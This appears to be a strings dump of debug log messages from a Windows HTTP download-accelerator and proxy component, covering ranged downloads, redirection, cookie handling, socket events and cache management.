[FileDownloadMgr::HelpSlowWorker] FDM=%d, Job:%d - BytesUntilBuffering: %lld
[FileDownloadMgr::HelpSlowWorker] FDM=%d ___Error - JobInfo invalid
[FileDownloadMgr::UpdatePlayRate] FDM=%d - Play Rate: %d, Duration: %d, Header Size: %lld
?[FileDownloadMgr::RedirectRequet] FDM=%d (%d),Req:%d - Worker was Redirected !
[FileDownloadMgr::RedirectRequet] FDM=%d (%d),Req:%d ___Error RestartWorkerToRedirectDomain
[FileDownloadMgr::RedirectRequet] FDM=%d (%d),Req:%d ___Error AddDomainToRedirectList
[FileDownloadMgr::RedirectRequet] FDM=%d (%d),Req:%d ___Error UpdateRequest
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d - The Data should be sent.
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d ___Error The Data should NOT be sent.
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d ___Error Download was complete - closing the worker.
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d ___Error *** HD Acceleration NOT Supported ***
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d *** Not accelerating *** Not in Partner process and no UI found at: %s
JsDriver.exe
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d - Accelerating due to Partner.
[FileDownloadMgr::OnData] FDM=%d (%d),Req:%d ___Error FDM_State: %d.
[FileDownloadMgr::InitiateFirstDownloaders] **** FDM=%d, Initial Ranges: %lld-%lld
[FileDownloadMgr::DownloadNextRange] FDM=%d ___Warning Not allowed - FDM_State: %d, EOF: %d, Connections: %d/%d, Redirection problem: %d, Acceleration problem: %d, DownloadComplete: %d
[FileDownloadMgr::DownloadNextRange] FDM=%d ___Error - getting next range
[FileDownloadMgr::DownloadNextRange] FDM=%d, calling to stop UI notification
[FileDownloadMgr::DownloadNextRange] FDM=%d, 3G: %d
[FileDownloadMgr::UpdateMasterRanges] FDM=%d (%d),Req:%d - Master Remote Ranges: %lld-%lld (%lld bytes)
[FileDownloadMgr::UpdateMasterRanges] FDM=%d (%d),Req:%d - Time Acceleration, Begin: %lld
[FileDownloadMgr::UpdateMasterRanges] FDM=%d (%d),Req:%d Master Remote Ranges
[FileDownloadMgr::UpdateMasterRanges] FDM=%d (%d),Req:%d Master Remote Ranges - were already updated
[FileDownloadMgr::UpdateResponse] FDM=%d (%d),Req:%d ___Error Range not in Header or URI !
[FileDownloadMgr::UpdateResponse] FDM=%d (%d),Req:%d ___Warning Tried to modify a none Master response header
[FileDownloadMgr::UpdateResponse] FDM=%d (%d),Req:%d - Master was shorten
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - The header should not be sent.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - Stopping the worker.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d *** AccelerateIsSupported = TRUE ***
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error: Stopping this worker only - Range is bigger then master
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error: Stopping this worker only - Acceleration is not supported according to response.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error Worker Redirection failed - continue without redirection.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - Worker Request should be redirected
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error Stopping the worker - Acceleration was stopped.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Warning Seek Acceleration not supported according to its rule
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d *** ShouldAccelerate = TRUE ***
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - The header should be sent.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - The header should be sent (redirect)
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error adding the domain %s to the redirect list.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error updating the master response header.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error Master Redirection failed - continue without redirection.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - Master Request should be redirected
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - Got Redirect Response
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d ___Error Worker has no job.
[FileDownloadMgr::OnHeader] FDM=%d (%d),Req:%d - Header was received
[~FileDownloadMgr] FDM=%d - Leave
[~FileDownloadMgr] FDM=%d - Enter
[FileDownloadMgr] FDM=%d
[FileDownloadMgr] FDM=%d, LimitInitialConnections: %d
[FileDownloadMgr] FDM=%d, StartCachingSize: %d
[FileDownloadMgr] FDM=%d ___Error invalid HTTP Configuration
[FileDownloadMgr] FDM=%d ___Error invalid Config
[FileDownloadMgr::DownloadCacheData] FDM=%d - Request added.
[FileDownloadMgr::DownloadCacheData] FDM=%d ___Error adding request FDM=%d, Req:%d (IP:%s, port:%d).
[FileDownloadMgr::DownloadCacheData] FDM=%d ___Error initializing FDM=%d.
[FileDownloadMgr::DownloadCacheData] FDM=%d ___Error new FileDownloadMgr
[FileDownloadMgr::DownloadCacheData] FDM=%d
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d ___Error starting download sequence.
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Download sequence started!
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d (%d),Req:%d - Starting Request...
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d ___Error Creating Remote Master Worker
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d ___Warning *** Create a new FDM for caching ***
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d ___Warning *** Use owner FDM: %d ***
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d ___Warning *** Use existing Cached Data ***
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Total download time: %d sec, size: %lld
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Reset download time & size
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Extension changed the Request
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Virtual request - no need for Remote...
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Old IP = %s --> New IP = %s
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Current Request has a different domain - Need to Reset FDM.
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Download request not accelerated !!!
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Request queue is empty!
[FileDownloadMgr::InitiateDownloadSequence] FDM=%d - Starting the download sequence
[FileDownloadMgr::DownloadRequest] FDM=%d - Going To Download the Request
[FileDownloadMgr::DownloadRequest] FDM=%d ___Warning FDM_State: %d - Cannot initiate a new download, try again later...
[FileDownloadMgr::DownloadRequest] FDM=%d - FDM_State: %d
[FileDownloadMgr::OnDownloadCompleted] FDM=%d --- No new requests where started ---
[FileDownloadMgr::OnDownloadCompleted] FDM=%d --- The cache manager finished writing ---
[FileDownloadMgr::OnDownloadCompleted] FDM=%d --- No more active workers ---
[FileDownloadMgr::Work] FDM=%d - Exit thread now...
[FileDownloadMgr::Work] FDM=%d - ### Closing FDM - No more active Workers, Connections & Requests ###
[FileDownloadMgr::Work] FDM=%d - Thread was stopped (FDM_State: %d)
[FileDownloadMgr::Work] FDM=%d ___Error Thread should be stopped (FDM_State: %d)
[FileDownloadMgr::Work] FDM=%d - NumberOfActiveWorkers3G: %d, NumberOfActiveConnections3G: %d
[FileDownloadMgr::Work] FDM=%d - NumberOfActiveWorkers: %d, NumberOfActiveConnections: %d
[FileDownloadMgr::Work] FDM=%d - Thread should be stopped (command) - FDM_State: %d
[FileDownloadMgr::Work] FDM=%d - Cache manager not finished (FDM_State: %d)
[FileDownloadMgr::Work] FDM=%d - Thread should be stopped (timeout) - FDM_State: %d
[FileDownloadMgr::Work] FDM=%d - Done Caching - Thread should be stopped (timeout) - FDM_State: %d
[FileDownloadMgr::Work] FDM=%d - Thread was created (FDM_State: %d)
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d --- No new requests where started ---
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d --- The cache manager finished writing (STATE_FINISHED ==> FDM_COMPLETE_DOWNLOADING) ---
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d ___Error --- The cache manager failed writing the buffer. Going to stop the FDM (STATE_STOPPED) ---
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d ___Error CRITICAL_ERROR_STOP_FDM - Going to stop the FDM...
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d ___Error ERROR_TO_RECOVER_JOB - Continue Without Acceleration...
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d - JOB_WAS_RECOVERED
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d - NO_JOBS_TO_RECOVER
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d *** Stop Download - Not watching video ***
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d - NumberOfActiveWorkers3G: %d, NumberOfActiveConnections3G: %d
[FileDownloadMgr::HandleWorkingThreadTimeout] FDM=%d - NumberOfActiveWorkers: %d, NumberOfActiveConnections: %d
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Exit command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - The cache manager was stopped, Going to stop the FDM (STATE_STOPPED)
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d ___Error CRITICAL_ERROR_STOP_FDM - Going to stop the FDM...
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d ___Error ERROR_TO_RECOVER_JOB - Continue Without Acceleration...
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - JOB_WAS_RECOVERED
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - calling to stop UI notification
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - NO_JOBS_TO_RECOVER - Try to download next range (MaxConnections: %d)
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - NumberOfActiveWorkers: %d
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Job Finish command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - 3G Job Finish command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Resume Acceleration command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Buffer switched, send COMMAND_JOB_FINISHED
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Using cache & complete writing
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - The Peer is ready to be written into.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Connection Closed command was set - NumberOfActiveConnections: %d
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - 3G Connection Closed command was set - NumberOfActiveConnections3G: %d
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - New Request Started command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - New Request Added command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Abort Acceleration command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Start Accelerate command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - Stop Acceleration command was set.
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - NumberOfActiveWorkers3G: %d, NumberOfActiveConnections3G: %d
[FileDownloadMgr::HandleWorkingThreadCommand] FDM=%d - NumberOfActiveWorkers: %d, NumberOfActiveConnections: %d
[HttpProxyRemote - %p] FDM=%d (%d).
[~HttpProxyRemote - %p] FDM=%d (%d).
[HttpProxyRemote::SetCookies] FDM=%d (%d),Req:%d - Cookies: %s
[HttpProxyRemote::UpdateJobRange] FDM=%d (%d),Req:%d - Job:%d completed!
[HttpProxyRemote::UpdateJobRange] FDM=%d (%d),Req:%d - Range: %lld-%lld was updated
[HttpProxyRemote::UpdateJobRange] FDM=%d (%d),Req:%d ___Error job info invalid
[HttpProxyRemote::UpdateJobRange] FDM=%d (%d),Req:%d - New Range: %lld-%lld
[HttpProxyRemote::IncrementBytesToDiscard] FDM=%d (%d),Req:%d - Job:%d completed!
[HttpProxyRemote::IncrementBytesToDiscard] FDM=%d (%d),Req:%d ___Error Job info invalid
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error adding the port %d to the ignored list
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d socket %d - add the port %d to the ignored list
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error IRedirectController = NULL
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error: The function getpeername failed, LE: %d
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error binding to the socket %d
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[HttpProxyRemote::DisableRedirectionOnConnection] FDM=%d (%d),Req:%d ___Error: the current status is %s.
[HttpProxyRemote::Stop] FDM=%d (%d),Req:%d - Worker was stopped.
[HttpProxyRemote::Stop] FDM=%d (%d),Req:%d - Stopping Worker...
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d - Request was written to Local
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d - Going to write request to Local
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d - Read %d bytes from socket %d
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d ___Error: Reading from socket %d
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d - Reading from socket %d
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d ___Error: the Job object is null.
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[HttpProxyRemote::SocketReadyToReadFrom] FDM=%d (%d),Req:%d ___Error: the current download state is %s.
[HttpProxyRemote::GetFlvDataHeaderBytesToDiscard] FDM=%d (%d),Req:%d Discard Data Header: %lld
[HttpProxyRemote::GetMp4DataHeaderBytesToDiscard] FDM=%d (%d),Req:%d Discard Data Header: %lld
[HttpProxyRemote::GetMp4DataHeaderBytesToDiscard] FDM=%d (%d),Req:%d. Header Analize not complete - Accumulated: %d
[HttpProxyRemote::ReconnectReset] ___Error FDM=%d (%d),Req:%d - Invalid JobInfo
[HttpProxyRemote::ReconnectReset] FDM=%d (%d),Req:%d - Bytes Downloaded: %lld, Bytes Written: %lld
[HttpProxyRemote::CloseSocket] FDM=%d (%d),Req:%d - socket %d - close: %d
[HttpProxyRemote::ReConnectToDomain] FDM=%d (%d),Req:%d *** Going to delete the previous socket %d ***.
[HttpProxyRemote::ReConnectToDomain] FDM=%d (%d),Req:%d ___Warning Cannot empty buffer from socket !!!.
[HttpProxyRemote::ReConnectToDomain] FDM=%d (%d),Req:%d *** ReConnecting to the domain ***.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d - Wrote %d/%d bytes to Socket %d.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error writing the request.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error: the socket object is NULL.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Warning - switching to Transparent mode (not HTTP)
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Warning - switching to Transparent mode (CONNECT request)
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d - Going to write %d bytes to socket %d.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error: the socket object is null.
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Error writing the request. (status is %s).
HttpProxyRemote::WriteCachedBufferToSocket
[HttpProxyRemote::WriteCachedBufferToSocket] FDM=%d (%d),Req:%d ___Warning invalid job info
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d ___Error connecting to IP %s:%d. LE:%d
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d - Connected to IP - %s:%d
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d - Connecting to IP - %s:%d
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d ___Error invalid socket object
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d *** Going to initialize a new socket ***.
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d ___Error Resolving IP: %s. The function SafeGetHostByName falied.
HttpProxyRemote::ConnectToDomain
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d - *** Already connected to IP %s:%d *** (Reused)
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d ___Error job info invalid
[HttpProxyRemote::ConnectToDomain] FDM=%d (%d),Req:%d
[HttpProxyRemote::Finish] FDM=%d (%d), Req:%d - Worker Finished !
[HttpProxyRemote::Finish] FDM=%d (%d),Req:%d - Worker finished downloading it's range.
[HttpProxyRemote::Finish] FDM=%d (%d), Req:%d
[HttpProxyRemote::SocketWasConnected] FDM=%d (%d),Req:%d - Remote: %s: %d, socket %d
[HttpProxyRemote::SocketWasConnected] FDM=%d (%d),Req:%d ___Error IAsyncSocket invalid
[HttpProxyRemote::SocketWasConnected] FDM=%d (%d),Req:%d - Connect Time: %d ms (3G: %d)
[HttpProxyRemote::SocketWasConnected] FDM=%d (%d),Req:%d
[HttpProxyRemote::SocketWasClosed] Remote: %s:%d, socket %d
[HttpProxyRemote::SocketWasClosed] FDM=%d (%d),Req:%d, Job:%d - DownloadState:%d
[HttpProxyRemote::SocketWasClosed] FDM=%d (%d),Req:%d, Job:%d - SocketReadyToReadFrom
[HttpProxyRemote::SocketWasClosed] FDM=%d (%d),Req:%d, Job:%d
[HttpProxyRemote::GetDataHeaderBytesToDiscard] FDM=%d (%d),Req:%d - Need to accumulate more data...
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Worker is switching back to HEADER state
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - *** Finished downloading the request (DATA) ***. (wrote %lld data bytes).
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error writing the data
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Shift Socket Buffer ->>>- Worker is switching back to HEADER state
[HttpProxyRemote::WriteToLocal] ___Error FDM=%d (%d),Req:%d - *** Validate Continuousness with next job ***
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %d bytes from the data written.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Worker was stopped...
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - FileDownloadMgr written: %d bytes.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - The Data size is %d/%d bytes.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %lld Data bytes where discarded.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %lld Data Header bytes for padding.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %lld Data Header bytes where discarded.
[HttpProxyRemote::WriteToLocal] ___Error FDM=%d (%d),Req:%d *** Job Data not consistent after Recconnect ***
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Warning no data to send (accumulate data header).
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Warning no available data to send.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Warning no data to send.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Worker is in DATA state
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Worker is switching to DATA state (%d bytes)
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - *** Finished downloading the request (HEADER) ***.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Switching to DATA state
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Ignoring 1xx Response
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error writing the header
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Header was already downloaded
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %d/%d bytes from the header written by FDM (Redirected: %d)
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %d/%d bytes from the header written by Remote worker
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - %d/%d bytes from the new header written by Remote worker
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error HttpParser ParseHeader
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error HttpParser Initialize
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error HttpHeader BuildHeader
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Response header was changed
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - NO PassThrough mode after parse response
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Warning - switching to Transparent mode (not HTTP)
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - IN PassThrough mode after parse response
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - The header size is %d/%d bytes.
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Error The header is invalid - switch to PassThrough mode!
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d ___Warning Header is incomplete
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Worker is in HEADER state
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - NO PassThrough mode
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - IN PassThrough mode
[HttpProxyRemote::WriteToLocal] FDM=%d (%d),Req:%d - Going to analyze %d bytes.
[HttpProxyRemote::SaveRedirectInfo] FDM=%d (%d),Req:%d - SetCookie: %s (Response)
[HttpProxyRemote::SaveRedirectInfo] FDM=%d (%d),Req:%d - SetCookie: %s (Request)
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d ___Error: The function BuildHeader field.
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d - GetCookie: %s
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d ___Error: The function SetRanges field.
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d ___Error ParseHeader
HttpProxyRemote::UpdateRequest
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d ___Error: the socket object is NULL.
[HttpProxyRemote::UpdateRequest] FDM=%d (%d),Req:%d - Redirected: %d
[HttpProxyRemote::ReStartCurrentJob] FDM=%d (%d),Req:%d ___Error: The function UpdateRequest failed.
[HttpProxyRemote::ReStartCurrentJob] FDM=%d (%d),Req:%d *** ReStarting the job ***.
[HttpProxyRemote::ReStartCurrentJob] FDM=%d (%d),Req:%d ___Error: The function UpdateDomainName %s failed.
[HttpProxyRemote::ReStartCurrentJob]
[HttpProxyRemote::ReStartCurrentJob] FDM=%d (%d),Req:%d ___Error: the socket object is NULL.
[HttpProxyRemote::ReStartCurrentJob] FDM=%d (%d),Req:%d ___Error - Reached max redirections: %d
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - The error was not handled.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - Worker Status was set to WORKER_STATUS_ERROR.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - Job State was set to JOB_STATE_ERROR.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - The worker should be stopped - network error is Permanent !
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - The worker should be stopped - reached Maximum errors !
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - Network Error severity: %d.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d ___Error - m_DownloadState: %d, Errors: %d.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d, JobState:%d ___Error - range download flag is %d, m_DownloadState: %d, Errors: %d.
[HttpProxyRemote::ErrorOnSocket] FDM=%d (%d),Req:%d, Job:%d - Completed !
[HttpProxyRemote::UpdateParameters] ___Error invalid job or request
[HttpProxyRemote::UpdateParameters] FDM=%d (%d),Req:%d - Already connected
[HttpProxyRemote::UpdateParameters] FDM=%d (%d),Req:%d
[HttpProxyRemote::StartJob] FDM=%d (%d),Req:%d ___Warning: socket is not ready for writing.
[HttpProxyRemote::StartJob] FDM=%d (%d),Req:%d ___Warning: worker is not ready for download - State: %s
[HttpProxyRemote::StartJob] FDM=%d (%d),Req:%d - Already Connected to IP:%s.
[HttpProxyRemote::StartJob] FDM=%d (%d),Req:%d ___Error: The function UpdateParameters failed.
[HttpProxyRemote::StartJob] FDM=%d (%d),Req:%d - Starting %lld-%lld (size: %lld)
HttpProxyRemote::StartJob
[HttpProxyRemote::StartRecoveredJob] FDM=%d (%d),Req:%d
[RequestInfo::DownloadAccelerated] Req:%d - Accelerate: %d
[RequestInfo::SetPassThrough] Req:%d - ON
[RequestInfo] Req:%d
[~RequestInfo] Req:%d
https:
%s=%s%s%s
[HttpCookieJar::GetCookie] Removing cookie: %s
[HttpCookieJar::SetCookies] Removing cookie: %s
[NetworkEventsSink::RefreshSocket] socket %d - Refreshed
[NetworkEventsSink::RefreshSocket] ___Error WSAAsyncSelect on socket %d. LE: %d
[NetworkEventsSink::RefreshAsyncSocket] socket %d - Refreshed
[NetworkEventsSink::RefreshAsyncSocket] ___Error AsyncSelect on socket %d. LE: %d
[NetworkEventsSink::ClearSocketMessages] Messages: %d
[NetworkEventsSink::Find] socket %d - was found.
[NetworkEventsSink::Find] socket %d
[NetworkEventsSink::RemoveFromSocketsMap] socket %d - was removed from the sockets map.
[NetworkEventsSink::RemoveFromSocketsMap] socket %d - was not found in the sockets map.
[NetworkEventsSink::RemoveFromSocketsMap] socket %d
[NetworkEventsSink::WindowProc] Finished %s (%d) on socket %d. Err: %d
[NetworkEventsSink::WindowProc] ___Error %s occured (event %x) on socket %d
[NetworkEventsSink::WindowProc] *** %s occured on socket %d, Err: %d.
UNSUPPORTED_EVENT
[NetworkEventsSink::Work] ___Error creating a windows. LE: %d.
[NetworkEventsSink::Work] The class %s was register.
[NetworkEventsSink::Work] ___Error register the class %s. LE: %d
[NetworkEventsSink::RemoveSocket] socket %d - Removed from events sink.
[NetworkEventsSink::RemoveSocket] ___Error removeing socket %d from sockets map.
[NetworkEventsSink::RemoveSocket] ___Error WSAAsyncSelect on socket %d. LE: %d.
[NetworkEventsSink::RemoveAsyncSocket] socket %d - Removed from events sink
[NetworkEventsSink::RemoveAsyncSocket] ___Error removeing socket %d from sockets map.
[NetworkEventsSink::RemoveAsyncSocket] ___Error AsyncSelect on socket %d. LE: %d
[NetworkEventsSink::AddToSocketsMap] ___Warning - socket %d already exists in sockets map.
[NetworkEventsSink::AddToSocketsMap] socket %d - was added to sockets map.
[NetworkEventsSink::AddSocket] socket %d - Added events sink.
[NetworkEventsSink::AddSocket] ___Error WSAAsyncSelect on socket %d. LE: %d
[NetworkEventsSink::AddSocket] ___Error adding socket %d to sockets map.
[NetworkEventsSink::AddAsyncSocket] socket %d - Added to events sink
[NetworkEventsSink::AddAsyncSocket] ___Error AsyncSelect on socket %d. LE: %d
[NetworkEventsSink::AddAsyncSocket] ___Error adding socket %d to sockets map.
[CNetworkInterfaceManager::GetNumberOfInterfaces] Count: %d
[CNetworkInterfaceManager::RegisterInterfaceEvents] Total: %d
[CNetworkInterfaceManager::GetCellularInterfaceAddress] %s - %s
[CNetworkInterfaceManager::GetWifiInterfaceAddress] %s - %s
[CNetworkInterfaceManager::UnRegisterInterfaceEvents] Total: %d
[CNetworkInterfaceManager::VerifyInterface] Network Interface: %s
[CNetworkInterfaceManager::UpdateLocalIPs] Total: %d
[CNetworkInterfaceManager::UpdateLocalIPs] LocalHost IP: %s
[CHttpCacheManager::Cleanup] Cleanup, LastAccess: %d, LastCleanup: %d
[CHttpCacheManager::CreateCacheData] Cleanup, LastAccess: %d, LastCleanup: %d
[CHttpCacheManager::FindCacheData] Url: %s
Cookie: %s
[CHttpCacheManager::DestroyCacheData] Url: %s
[CHttpCacheManager::StopAllCaching] Try to stop - CD:%d, Domain: %s
[CHttpCacheManager::StopAllCaching]
[CHttpCacheManager::Work] ...Leave
[CHttpCacheManager::Work] Cleanup - LastAccess: %d, LastCleanup: %d, Interval: %d -> %d
[CHttpCacheManager::Work] Enter...
[AsyncSocket::Listen] ___Error listening on socket %d. LE: %d
[AsyncSocket::SetInternalFlag] socket %d - SOCKET_IS_CELLULAR: %d -> %d
[AsyncSocket::SetInternalFlag] socket %d - SOCKET_CAN_BE_WRITE_TO: %d -> %d
[AsyncSocket::SetInternalFlag] socket %d - SOCKET_CAN_BE_READ_FROM: %d -> %d
[AsyncSocket::SetInternalFlag] socket %d - SOCKET_CONNECTION_ESTABLISHED: %d -> %d
[AsyncSocket::GetInternalFlag] socket %d - SOCKET_IS_CELLULAR: %d
[AsyncSocket::GetInternalFlag] socket %d - SOCKET_CAN_BE_WRITE_TO: %d
[AsyncSocket::GetInternalFlag] socket %d - SOCKET_CAN_BE_READ_FROM: %d
[AsyncSocket::GetInternalFlag] socket %d - SOCKET_CONNECTION_ESTABLISHED: %d
